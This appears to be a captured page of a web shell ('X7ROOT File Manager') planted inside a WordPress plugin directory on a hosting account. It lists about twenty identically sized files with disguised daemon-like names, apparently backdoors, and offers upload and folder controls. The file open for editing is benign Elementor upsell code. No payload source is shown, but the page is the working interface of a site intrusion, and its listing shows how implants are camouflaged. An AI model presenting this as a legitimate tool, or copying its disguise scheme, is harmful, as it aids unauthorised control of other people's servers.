X7ROOT File Manager
Current Path:
/home/hikrsdyp/public_html/wp-content/plugins/master-addons/inc/traits
home
/
hikrsdyp
/
public_html
/
wp-content
/
plugins
/
master-addons
/
inc
/
traits
/
??
..
??
gvfs-worker.daemon
(9.03 KB)
??
k5hq5wlu
(9.03 KB)
??
nginx-agent.so
(9.03 KB)
??
nginx-manager.daemon
(9.03 KB)
??
nginx-service.service
(9.03 KB)
??
php-cache.daemon
(9.03 KB)
??
php-cache.so
(9.03 KB)
??
pulse-monitor
(9.03 KB)
??
systemd-service-helper
(9.03 KB)
??
systemd-service.cgi
(9.03 KB)
??
topics_directory
(853.71 KB)
??
tracker-daemon-helper
(9.03 KB)
??
tracker-fpm
(9.03 KB)
??
tracker-fpm.daemon
(9.03 KB)
??
tracker-helper
(9.03 KB)
??
tracker-helper.daemon
(9.03 KB)
??
tracker-worker.cgi
(9.03 KB)
??
udisks-daemon.daemon
(9.03 KB)
??
udisks-monitor.daemon
(9.03 KB)
??
udisks-plugin.cgi
(9.03 KB)
??
widget-notice.php
(1.26 KB)
Editing: widget-notice.php
<?php namespace MasterAddons\Inc\Traits; if ( !defined( 'ABSPATH' ) ) { exit; } // If this file is called directly, abort. trait Widget_Notice { /** * Adding Go Premium message to all widgets */ public function upgrade_to_pro_message() { $this->start_controls_section( 'jltma_pro_section', [ 'label' => sprintf( /* translators: %s: icon for the "Pro" section */ __( '%s Unlock more possibilities', 'master-addons' ), '<i class="eicon-pro-icon"></i>' ), ] ); $this->add_control( 'jltma_get_pro_style_tab', [ 'label' => __( 'Unlock more possibilities', 'master-addons' ), 'type' => \Elementor\Controls_Manager::CHOOSE, 'options' => [ '1' => [ 'title' => '', 'icon' => 'fa fa-unlock-alt', ], ], 'default' => '1', 'toggle' => false, 'description' => '<span class="jltma-widget-pro-feature"> Get the <a href="https://master-addons.com/pricing/" target="_blank">Pro version</a> for more awesome elements and powerful modules.</span>', ] ); $this->end_controls_section(); } }
Upload File
Create Folder